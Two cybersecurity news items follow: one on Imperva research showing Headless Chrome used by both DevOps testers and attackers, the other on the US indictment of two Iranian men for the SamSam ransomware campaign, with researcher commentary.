Google Chrome has long been a popular web browser, but since the introduction of the headless mode functionality, the browser has grow in popularity not only among software engineers and testers but also with attackers, according to Imperva.

According to recently published research, "Headless Chrome: DevOps Love It, So Do Hackers, Here’s Why," the headless technique has grown more popular, particularly since Chrome introduced the functionality last year. Additionally, malicious actors are using the technique to target specific sites and exploit newly released vulnerabilities.

When Chrome is running without its “head," or GUI, the latest full version of the Chrome browser is executed with the added perk of being able to control it programmatically on servers without dedicated graphics or display.

“In headless mode, it’s possible to run large scale web application tests, navigate from page to page without human intervention, confirm JavaScript functionality and generate reports,” wrote Imperva’s Dima Beckerman.

While DevOps appreciates the ability to benignly run large scale tests, attackers are able to leverage the same functionality for malicious purposes by evaluating JavaScript or emulating browser functionality.

“We observe more than 10K unique IP addresses daily performing scraping, sniping, carding, blackhat SEO and other types of malicious activity where JavaScript evaluation is necessary to perform the attack,” Beckerman said.

While automation in web browsers isn’t exclusive to Chrome, said Beckerman, “in comparison to other headless browsers and automation frameworks, Headless Chrome overtook the previous leader, PhantomJS, within a year of its release.”

Automated browser trends over the last year. Credit: Imperva

In addition to Chrome constantly adding new features and introducing new trends in web development, Headless Chrome has also become popular because of its support for a wide range of operating systems. DevOps appreciates Chrome’s convenient development tools and features, according to Imperva.

However, as much as DevOps has embraced Headless Chrome, “Chrome occupies the top of the 'attackers’ podium,' with half of the malicious traffic divided evenly between execution in headless and non-headless mode,” Beckerman wrote.

Because Headless Chrome is used for both malicious and legitimate purposes, Beckerman said blocking the automated browser should be done on a case-by-case basis, depending on the intent and behavior of each individual IP address.

Categories: Cyber Risk News

US Indicts Two Iranians for SamSam Campaign Blitz

Thu, 11/29/2018 - 11:03
US Indicts Two Iranians for SamSam Campaign Blitz

Two Iranian men have been indicted for a string of ransomware attacks over the past three years, causing $30m in losses to over 200 organizations, mainly in the US.

Faramarz Shahi Savandi, 34, and Mohammad Mehdi Shah Mansouri, 27, are accused of operating the infamous SamSam ransomware variant which targeted notable organizations including the Hollywood Presbyterian Medical Center, City of Atlanta, MedStar Health, Kansas Heart Hospital and the City of Newark.

The two are said to have made over $6m from their scheme to date, creating the first version of the malware in December 2015 before updating it in June and October 2017.

The attacks differed from many ransomware campaigns in being highly targeted, with the duo researching their victims, scanning for vulnerabilities and then striking outside of business hours to cause maximum disruption, all while disguising attacks as legitimate network traffic.

The two are charged with: one count of conspiracy to commit wire fraud; one count of conspiracy to commit fraud and related activity in connection with computers; two substantive counts of intentional damage to a protected computer; and two substantive counts of transmitting a demand in relation to damaging a protected computer.

They’re unlikely to be brought to justice, as the duo remain in Iran. However, the US Treasury has decided to impose sanctions on two more men, Ali Khorashadizadeh and Mohammad Ghorbaniyan, whose accounts are said to have been used to receive the stolen Bitcoin funds.

The move is more a statement of intent than anything else, as the two could simply open new cryptocurrency accounts elsewhere.

FireEye cybercrime analysis manager, Kimberly Goody, claimed the two may have targeted critical infrastructure organizations to improve their chances of receiving a pay-out.

“In our SamSam investigations, we observed activity consistent with that noted in the indictment including the exploitation of external servers as well as updates to their initial infection vectors over time. Deploying ransomware post-compromise also allows attackers the ability to better understand victim environments and to both deploy ransomware payloads more broadly and to identified high value systems – putting additional pressure on organizations to pay,” she added.

“It is also important to note that while the actors named in the indictment are associated with the SamSam ransomware, this may just be their most lucrative operation. We have some evidence to suggest that they were investigating the possibility of stealing card payment data, and we have also seen the deployment of cryptocurrency miners in victim environments.”

Sophos principal research scientist, Chester Wisniewski, argued that SamSam may be just the start of a new wave of targeted ransomware.

“Once in, they move laterally, working one step at a time to steal domain admin credentials, manipulate internal controls, disable back-ups and more to hand-deliver the ransomware,” he continued. “By the time most IT managers notice what’s happening, the damage is done. Other cyber-criminals have taken note, and in 2019 we expect copycat attacks.”

Categories: Cyber Risk News